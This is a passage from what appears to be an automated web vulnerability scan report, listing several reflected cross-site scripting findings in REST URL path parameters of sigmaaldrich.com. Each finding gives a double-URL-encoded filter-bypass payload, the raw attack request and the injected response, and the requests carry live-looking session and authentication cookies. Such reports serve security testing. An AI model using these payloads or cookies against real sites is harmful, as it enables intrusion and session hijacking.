Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:01 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcd0c68";alert(1)//747b3286d23/medialib/labware/labware-icons/gas-equipment","E404") ;
   </script>
...[SNIP]...

1.369. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/gas-equipment [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/gas-equipment

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35585%2522%253balert%25281%2529%252f%252f2e2a504b82d was submitted in the REST URL parameter 2. This input was echoed as 35585";alert(1)//2e2a504b82d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib35585%2522%253balert%25281%2529%252f%252f2e2a504b82d/labware/labware-icons/gas-equipment HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:02 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib35585";alert(1)//2e2a504b82d/labware/labware-icons/gas-equipment","E404") ;
   </script>
...[SNIP]...

1.370. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/gas-equipment [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/gas-equipment

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c781f%2522%253balert%25281%2529%252f%252f18b4b07a572 was submitted in the REST URL parameter 3. This input was echoed as c781f";alert(1)//18b4b07a572 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labwarec781f%2522%253balert%25281%2529%252f%252f18b4b07a572/labware-icons/gas-equipment HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:04 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labwarec781f";alert(1)//18b4b07a572/labware-icons/gas-equipment","E404") ;
   </script>
...[SNIP]...

1.371. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/gas-equipment [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/gas-equipment

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5465%2522%253balert%25281%2529%252f%252fe33ad45c490 was submitted in the REST URL parameter 4. This input was echoed as d5465";alert(1)//e33ad45c490 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-iconsd5465%2522%253balert%25281%2529%252f%252fe33ad45c490/gas-equipment HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:06 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-iconsd5465";alert(1)//e33ad45c490/gas-equipment","E404") ;
   </script>
...[SNIP]...

1.372. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/gas-equipment [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/gas-equipment

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e088%2522%253balert%25281%2529%252f%252f0567c4bf040 was submitted in the REST URL parameter 5. This input was echoed as 3e088";alert(1)//0567c4bf040 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/gas-equipment3e088%2522%253balert%25281%2529%252f%252f0567c4bf040 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:08 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/gas-equipment3e088";alert(1)//0567c4bf040","E404") ;
   </script>
...[SNIP]...

1.373. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/glassware [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/glassware

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bf8d%2522%253balert%25281%2529%252f%252ffb934201d4c was submitted in the REST URL parameter 1. This input was echoed as 4bf8d";alert(1)//fb934201d4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc4bf8d%2522%253balert%25281%2529%252f%252ffb934201d4c/medialib/labware/labware-icons/glassware HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
